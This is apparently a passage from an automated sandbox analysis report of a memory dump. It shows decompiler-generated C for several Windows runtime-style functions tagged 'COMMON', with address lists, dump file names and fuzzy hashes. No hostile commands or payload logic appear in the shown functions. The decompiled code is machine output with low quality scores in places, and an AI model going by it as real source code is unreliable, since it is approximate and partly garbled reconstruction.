					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x4c587e8 = _t30;
						 *0x4c587e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E04BBD0D1(L04BF4320());
			}

0x04bf4257
0x04bf4257
0x04bf4257
0x04bf4259
0x04bf425e
0x04bf4263
0x04bf4265
0x04bf4273
0x04bf4278
0x04bf427c
0x04bf427f
0x04bf4281
0x04bf4287
0x04bf42d7
0x04bf42d7
0x04bf42da
0x04bf428d
0x04bf428d
0x04bf428f
0x04bf4292
0x04bf4297
0x04bf429c
0x04bf42a0
0x04bf42a6
0x04bf42a8
0x04bf42ae
0x04bf42b3
0x00000000
0x04bf42ba
0x04bf42ba
0x04bf42bf
0x04bf42c5
0x04bf42ca
0x04bf42cf
0x04bf42d0
0x00000000
0x04bf42d0
0x04bf42b3
0x00000000
0x04bf42a6
0x04bf429c
0x04bf42dc
0x04bf42dc
0x04bf42e3
0x04bf4309
0x04bf42e5
0x04bf42e5
0x04bf42e8
0x04bf42ee
0x04bf42f0
0x00000000
0x04bf42f2
0x04bf42f2
0x04bf42f4
0x04bf42f7
0x04bf42f9
0x04bf4300
0x04bf4300
0x04bf42f0
0x04bf430e
0x04bf431f

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90a9f0f570fc890ef40d9c8e508337230e4d7a5e56cab2970273c3f912bcc637
Instruction ID: 3575a43ac15798572ead2209e5afa3dfe9a23ece86fe94c80edbba6991ff7cdb
Opcode Fuzzy Hash: 90a9f0f570fc890ef40d9c8e508337230e4d7a5e56cab2970273c3f912bcc637
Instruction Fuzzy Hash: 02216D74510700CFDB14EFB9D9006197BF5FB95358B5082EAD2199B290DB39F899CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04BE46A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04BE46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04B84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E04BAF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E04B9D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L04B877F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x04be46b7
0x04be46ba
0x04be46c5
0x04be46c8
0x04be46d0
0x04be46d4
0x04be46e6
0x04be46e9
0x04be46f4
0x04be46ff
0x04be4705
0x04be4706
0x04be470c
0x04be4713
0x04be471b
0x04be4723
0x04be4725
0x04be46d6
0x04be46d9
0x04be46db
0x04be46db
0x04be4732

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: b984411ea80e5a2b3e1235bdb9effb45793e635570b9a9ab034b4bba58acb044
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: AD11E572504208BFDB059F5DD8808BEBBB9EF95304F1080AEF944C7350DA319D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 04B92397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E04B92397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x4c5848c != 0) {
					L04B8FAD0(0x4c58610);
					if( *0x4c5848c == 0) {
						E04B8FA00(0x4c58610, _t19, _t27, 0x4c58610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04B92581(0x4c58610, 0x4b450a0, _t26, _t27, _t28);
						E04B8FA00(0x4c58610, 0x4b450a0, _t27, 0x4c58610);
					}
				} else {
					L1:
					_t11 =  *0x4c58614; // 0x1
					if(_t11 == 0) {
						_t11 = E04BA4886(0x4b41088, 1, 0x4c58614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04B92581(0x4c58610, (_t11 << 4) + 0x4b45070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x04b923b0
0x04b923b6
0x04b92409
0x04b92415
0x04bd5ae9
0x00000000
0x04b9241b
0x04b9241b
0x04b9241d
0x04b92427
0x04b9242e
0x04b92430
0x04b92430
0x04b923b8
0x04b923b8
0x04b923b8
0x04b923bf
0x04b923fc
0x04b923fc
0x04b923c1
0x04b923c3
0x04b923d0
0x04b923d8
0x04b923d8
0x04b923dc
0x04b923de
0x04b923e1
0x04b923e1
0x04b923ec

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce3ddcdb836673cac6dd3ca06b943a42cef70a17e5236a0d571b5773673afd33
Instruction ID: 29d65d9692f4d9c5e69c7cece8b130e55719af6ea00715e94a80435448f3bfab
Opcode Fuzzy Hash: ce3ddcdb836673cac6dd3ca06b943a42cef70a17e5236a0d571b5773673afd33
Instruction Fuzzy Hash: CB110C32B447007BFB34BA399C80B2977DDEB90664F1448F5EA01A7250DA74FC419765

Uniqueness

Uniqueness Score: -1.00%

Function 04B6C962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E04B6C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x4c5d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E04B7EEF0(0x4c570a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E04BEF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E04B7EB70(_t29, 0x4c570a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E04BAB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E04BEF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x4c570c0; // 0x0
					while(_t38 != 0x4c570c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x4c5b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x04b6c96a
0x04b6c974
0x04b6c988
0x04b6c98a
0x04bd7c9d
0x04bd7c9f
0x04bd7ca4
0x04bd7cae
0x04bd7cf0
0x04bd7cf5
0x04bd7cfa
0x04b6c992
0x04b6c996
0x04b6c997
0x04b6c998
0x04b6c9a3
0x04b6c9a3
0x04bd7cb0
0x04bd7cb7
0x04bd7cbb
0x00000000
0x00000000
0x04bd7cbd
0x04bd7ce8
0x04bd7cc5
0x04bd7cc8
0x04bd7cca
0x04bd7cd0
0x04bd7cd6
0x04bd7cde
0x04bd7ce4
0x04bd7ce4
0x04bd7cd0
0x00000000
0x04bd7ce8
0x04b6c990
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf4ec5ff6e1463e84090cdb074a5ad44bb9274ba93eb073aef462901f99f3e18
Instruction ID: c42dc44121fe67a258073ad29d77e36fb2f0c375a9a6af290d1bf87931e3f8c5
Opcode Fuzzy Hash: bf4ec5ff6e1463e84090cdb074a5ad44bb9274ba93eb073aef462901f99f3e18
Instruction Fuzzy Hash: 7B11A0313006069FDB60AE68D885A6BBBE5FB84618F0405A9E95593650EF24FC90CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 04BA37F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E04BA37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04B82280(_t6, 0x4c58550);
				}
				_t29 = E04BA387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E04B7FFB0(0x4c58550, _t27, 0x4c58550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x04ba37fa
0x04ba37fc
0x04ba3805
0x04ba3808
0x04ba3808
0x04ba3814
0x04ba3818
0x04ba3846
0x04ba3848
0x04ba384b
0x04ba384b
0x04ba3852
0x00000000
0x04ba3854
0x04ba3856
0x00000000
0x00000000
0x04ba3863
0x00000000
0x04ba3863
0x04ba381a
0x04ba381a
0x04ba381f
0x04ba386e
0x04ba386e
0x04ba3871
0x04ba3873
0x04ba3873
0x04ba3868
0x00000000
0x04ba3868
0x04ba3821
0x04ba3826
0x00000000
0x00000000
0x04ba3828
0x04ba382a
0x04ba3841
0x00000000
0x04ba3841

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08c3745f5770e50504cf6b4282ca17263c50505b7caf1d17042eb174902b1d72
Instruction ID: ffb7c8f12bb3b85ece2a90926cdf2def9ba95322f303330eed4b6772b91880ba
Opcode Fuzzy Hash: 08c3745f5770e50504cf6b4282ca17263c50505b7caf1d17042eb174902b1d72
Instruction Fuzzy Hash: 840149B2A0A6109BD3379F19D900E2ABBE6DF81B60B1550EDEC058B310DB30F850C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 04B9002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B9002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04B87D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04B87D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04B87D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04B87D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x04b90032
0x04b90037
0x04b90043
0x04bd4b3a
0x04b90049
0x04b90049
0x04b90049
0x04b9004e
0x04b90053
0x04bd4b48
0x04bd4b5a
0x04bd4b4a
0x04bd4b53
0x04bd4b53
0x04bd4b5f
0x00000000
0x04bd4b61
0x00000000
0x04bd4b61
0x04b90059
0x04b90059
0x04b90060
0x04bd4b6f
0x04bd4b6f
0x04b90069
0x04bd4b83
0x00000000
0x00000000
0x04bd4b90
0x04bd4b9b
0x04bd4b9b
0x04bd4ba4
0x00000000
0x00000000
0x04bd4baa
0x00000000
0x04b9006f
0x04b9006f
0x00000000
0x04b9006f
0x04b90069

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: daa5ca14d4f26ce20cbdb8eda98c17fc8a3079ce98c4496292c26d9a7daa7658
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: A311A9722016819FEB22AB288D48B2537D8EF41B5CF1900E0D9148B6A2FB38F841D264

Uniqueness

Uniqueness Score: -1.00%

Function 04B7766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04B7766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E04B9F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E04B9F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04B84620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x04b77672
0x04b7767f
0x04b77689
0x04b776de
0x04b776de
0x04b7768b
0x04b77691
0x04b77693
0x04b77697
0x00000000
0x04b77699
0x04b776a8
0x00000000
0x04b776aa
0x04b776ad
0x04b776b1
0x00000000
0x04b776b3
0x04b776b3
0x04b776b5
0x04b776ba
0x04b776bc
0x04b776bc
0x04b776c0
0x00000000
0x04b776c2
0x04b776ce
0x04b776ce
0x04b776c0
0x04b776b1
0x04b776a8
0x04b77697
0x04b776d9

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 577d455d8d0be63a55445b09658084fc06b9da7e8d483d5b5a8a110443163bf0
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: FC018832700119AFDB20AE5EDC81E5B77EDEB84760B2405B4B928CB254DE30FD01E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04B69080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E04B69080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4c585ec;
				E04B82280(_t48, 0x4c585ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E04B7FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4c5538c; // 0x776f6888
					if( *_t84 != 0x4c55388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x4c3f6e8);
						E04BBD0E8(0x4c585ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E04C388F5(_t80, _t85, 0x4c55388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4c586c0; // 0xa907b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4c586b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04B82280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04C388F5(0x4c585ec, _t85, 0x4c55388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E04BAAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4c5b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4c584c0;
																			if(_t82 >=  *0x4c584c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04C39063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E04B6922A(_t99);
										_t64 = E04B87D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04C38B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4c586c0; // 0xa907b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4c586b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x4c586bc;
													_t87 = 0x4c586b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04B69240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4c586c4;
												_t87 = 0x4c586c0;
												L27:
												E04B99B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E04BBD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4c55388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4c5538c = _t51;
						goto L6;
					}
				}
			}

0x04b69082
0x04b69083
0x04b69084
0x04b69085
0x04b69087
0x04b69096
0x04b69098
0x04b69098
0x04b6909e
0x04b690a8
0x04b690e7
0x04b690e7
0x04b690aa
0x04b690b0
0x04b690b7
0x04b690bd
0x04b690dd
0x04b690e6
0x04b690bf
0x04b690bf
0x04b690c7
0x04b690cf
0x04b690f1
0x04b690f2
0x04b690f4
0x04b690f5
0x04b690f6
0x04b690f7
0x04b690f8
0x04b690f9
0x04b690fa
0x04b690fb
0x04b690fc
0x04b690fd
0x04b690fe
0x04b690ff
0x04b69100
0x04b69102
0x04b69107
0x04b6910c
0x04b69110
0x04b69113
0x04b69115
0x04b69136
0x04b6913f
0x04b69143
0x04bc37e4
0x04bc37e4
0x04b69117
0x04b69117
0x04b6911d
0x00000000
0x04b6911f
0x04b6911f
0x04b69125
0x00000000
0x04b69127
0x04b6912d
0x04b69130
0x04b69134
0x04b69158
0x04b6915d
0x04b69161
0x04b69168
0x04bc3715
0x04b6916e
0x04b6916e
0x04b69175
0x04b69177
0x04b6917e
0x04b6917f
0x04b69182
0x04b69182
0x04b69187
0x04b69187
0x04b6918a
0x04b6918d
0x04b6918f
0x04b69192
0x04b69195
0x04b69198
0x04b69198
0x04b69198
0x04b6919a
0x00000000
0x00000000
0x04bc371f
0x04bc3721
0x04bc3727
0x04bc372f
0x04bc3733
0x04bc3735
0x04bc3738
0x04bc373b
0x04bc373d
0x04bc3740
0x00000000
0x04bc3746
0x04bc3746
0x04bc3749
0x00000000
0x04bc374f
0x04bc374f
0x04bc3751
0x04bc3757
0x04bc3759
0x04bc375c
0x04bc375c
0x04bc375e
0x04bc375e
0x04bc3761
0x04bc3764
0x00000000
0x00000000
0x04bc3766
0x04bc3768
0x04bc37a3
0x04bc37a3
0x04bc37a5
0x04bc37a7
0x04bc37ad
0x04bc37b0
0x04bc37b2
0x04bc37bc
0x04bc37c2
0x04bc37c2
0x04bc37b2
0x04b69187
0x04b69187
0x04b6918a
0x04b6918d
0x04b6918f
0x04b69192
0x04b69195
0x00000000
0x04b69195
0x00000000
0x04bc376a
0x04bc376a
0x04bc376a
0x04bc376c
0x04bc376c
0x04bc376f
0x04bc3775
0x00000000
0x00000000
0x04bc3777
0x04bc3779
0x04bc3782
0x04bc3787
0x04bc3789
0x04bc3790
0x04bc3790
0x04bc378b
0x04bc378b
0x04bc378b
0x04bc3792
0x04bc3795
0x00000000
0x04bc3795
0x00000000
0x04bc3779
0x04bc3798
0x00000000
0x04bc3798
0x00000000
0x04bc3768
0x04bc379b
0x04bc379b
0x04bc3751
0x04bc3749
0x00000000
0x04bc3740
0x04b691a0
0x04b691a3
0x04b691a9
0x04b691b0
0x00000000
0x04b691b0
0x04b69187
0x04b691b4
0x04b691b4
0x04b691bb
0x04b691c0
0x04b691c5
0x04b691c7
0x04bc37da
0x04b691cd
0x04b691cd
0x04b691cd
0x04b691d2
0x04b691d5
0x04b69239
0x04b69239
0x04b691d7
0x04b691db
0x04b691e1
0x04b691e7
0x04b691fd
0x04b69203
0x04b6921e
0x04b69223
0x00000000
0x04b69205
0x04b69205
0x04b69208
0x04b6920c
0x04b69214
0x04b69214
0x04b6920c
0x04b691e9
0x04b691e9
0x04b691ee
0x04b691f3
0x04b691f3
0x04b691f3
0x04b691e7
0x00000000
0x00000000
0x00000000
0x04b69134
0x04b69125
0x04b6911d
0x04b6914e
0x04b690d1
0x04b690d1
0x04b690d3
0x04b690d6
0x04b690d8
0x00000000
0x04b690d8
0x04b690cf

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1aa66aaa0d8f146108a400315ad27e5e42e59662728a4d6491732a3baa71c6
Instruction ID: 580b69db8e1066b04816686ea42d5f802bc0c0787e6d612326ab4f51ac494a60
Opcode Fuzzy Hash: 5e1aa66aaa0d8f146108a400315ad27e5e42e59662728a4d6491732a3baa71c6
Instruction Fuzzy Hash: 0D01A4B26026049FE3199F24D840B2577B9EB45724F2540A6E5069B6A1D778FC81CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04BFC450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04BFC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04BA9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
